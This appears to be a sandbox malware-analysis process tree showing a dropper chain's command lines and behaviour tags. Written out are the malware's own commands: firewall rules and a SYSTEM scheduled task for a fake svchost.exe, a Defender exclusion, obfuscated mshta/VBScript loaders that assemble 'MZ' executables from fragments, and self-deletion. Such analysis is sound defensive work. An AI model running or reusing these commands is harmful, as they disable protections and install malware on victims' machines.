C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes5⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes5⤵
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM4⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0u2xG04QKCAjjQdTQBYBGzVU.exe"C:\Users\Admin\Pictures\Adobe Films\0u2xG04QKCAjjQdTQBYBGzVU.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\803309.exe"C:\Users\Admin\AppData\Local\803309.exe"5⤵
-
-
C:\Users\Admin\AppData\Local\784388.exe"C:\Users\Admin\AppData\Local\784388.exe"5⤵
-
-
C:\Users\Admin\AppData\Local\539665.exe"C:\Users\Admin\AppData\Local\539665.exe"5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\539665.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\539665.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\539665.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\539665.exe" ) do taskkill -f -Im "%~NXZ"7⤵
-
C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ). RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I + sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i & CopY /b /Y CPkpI.I + sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q *10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"11⤵
-
-
C:\Windows\SysWOW64\control.execontrol ..\WfNRfms4.K11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K12⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "539665.exe"8⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\8059423.exe"C:\Users\Admin\AppData\Local\8059423.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"6⤵
-
-
-
C:\Users\Admin\AppData\Local\137866.exe"C:\Users\Admin\AppData\Local\137866.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 15405⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 6565⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 6685⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 6765⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 6885⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"6⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c0,0x1bc,0x1b8,0x1c4,0x1b4,0x7ffbfd07dec0,0x7ffbfd07ded0,0x7ffbfd07dee07⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=1784 /prefetch:87⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=2188 /prefetch:87⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1736 /prefetch:27⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2524 /prefetch:17⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2496 /prefetch:17⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=3208 /prefetch:87⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3264 /prefetch:27⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=3440 /prefetch:87⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=3656 /prefetch:87⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=2700 /prefetch:87⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=3788 /prefetch:87⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\scfT65Yi8gy0dT5r5wdXmZND.exe"C:\Users\Admin\Pictures\Adobe Films\scfT65Yi8gy0dT5r5wdXmZND.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\scfT65Yi8gy0dT5r5wdXmZND.exe" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IuYBm3lYwBFvWH4EQPU9_Ywq.exe"C:\Users\Admin\Pictures\Adobe Films\IuYBm3lYwBFvWH4EQPU9_Ywq.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\IuYBm3lYwBFvWH4EQPU9_Ywq.exe"C:\Users\Admin\Pictures\Adobe Films\IuYBm3lYwBFvWH4EQPU9_Ywq.exe"4⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ydWz5wGfm19stkAY4iMIn9Xd.exe"C:\Users\Admin\Pictures\Adobe Films\ydWz5wGfm19stkAY4iMIn9Xd.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\_Jl5NRQH_VCxgKevGBMlhDUr.exe"C:\Users\Admin\Pictures\Adobe Films\_Jl5NRQH_VCxgKevGBMlhDUr.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\fIluvx59br0pDNhWxyCvlECC.exe"C:\Users\Admin\Pictures\Adobe Films\fIluvx59br0pDNhWxyCvlECC.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\64sJSaHtBgpmY3s9JraLL3AH.exe"C:\Users\Admin\Pictures\Adobe Films\64sJSaHtBgpmY3s9JraLL3AH.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\64sJSaHtBgpmY3s9JraLL3AH.exe"C:\Users\Admin\Pictures\Adobe Films\64sJSaHtBgpmY3s9JraLL3AH.exe"4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rJhMZvnFmewWMgIePRFsY_sA.exe"C:\Users\Admin\Pictures\Adobe Films\rJhMZvnFmewWMgIePRFsY_sA.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\rJhMZvnFmewWMgIePRFsY_sA.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\rJhMZvnFmewWMgIePRFsY_sA.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\rJhMZvnFmewWMgIePRFsY_sA.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\rJhMZvnFmewWMgIePRFsY_sA.exe" ) do taskkill -im "%~NxK" -F5⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F8⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "9⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"9⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY9⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "rJhMZvnFmewWMgIePRFsY_sA.exe" -F6⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\U8hSQeS66LgtVXmVBPhymyYt.exe"C:\Users\Admin\Pictures\Adobe Films\U8hSQeS66LgtVXmVBPhymyYt.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 11644⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7nRws0NZGWjLcr1qIJ1Igckp.exe"C:\Users\Admin\Pictures\Adobe Films\7nRws0NZGWjLcr1qIJ1Igckp.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\7nRws0NZGWjLcr1qIJ1Igckp.exe" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zpFE8L30S3ZheXNi_5l2ALWi.exe"C:\Users\Admin\Pictures\Adobe Films\zpFE8L30S3ZheXNi_5l2ALWi.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 8924⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Pictures\Adobe Films\QRv0Xx09eP0r7lpAjuMx11pq.exe"C:\Users\Admin\Pictures\Adobe Films\QRv0Xx09eP0r7lpAjuMx11pq.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Underdress.exeC:\Users\Admin\AppData\Roaming\Underdress.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"5⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exeC:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3080 -s 5565⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mI2vdU7xMU71GNyMSHNLycKr.exe"C:\Users\Admin\Pictures\Adobe Films\mI2vdU7xMU71GNyMSHNLycKr.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\A3Rw_r8xR62BWeGihBmsdcHY.exe"C:\Users\Admin\Pictures\Adobe Films\A3Rw_r8xR62BWeGihBmsdcHY.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\3W_ChRgsBOU9yBhDHPqm8yDD.exe"C:\Users\Admin\Pictures\Adobe Films\3W_ChRgsBOU9yBhDHPqm8yDD.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\RbCJ73zVujImtMJHqjLMBZ0z.exe"C:\Users\Admin\Pictures\Adobe Films\RbCJ73zVujImtMJHqjLMBZ0z.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cscript.exe"C:\Windows\SysWOW64\cscript.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
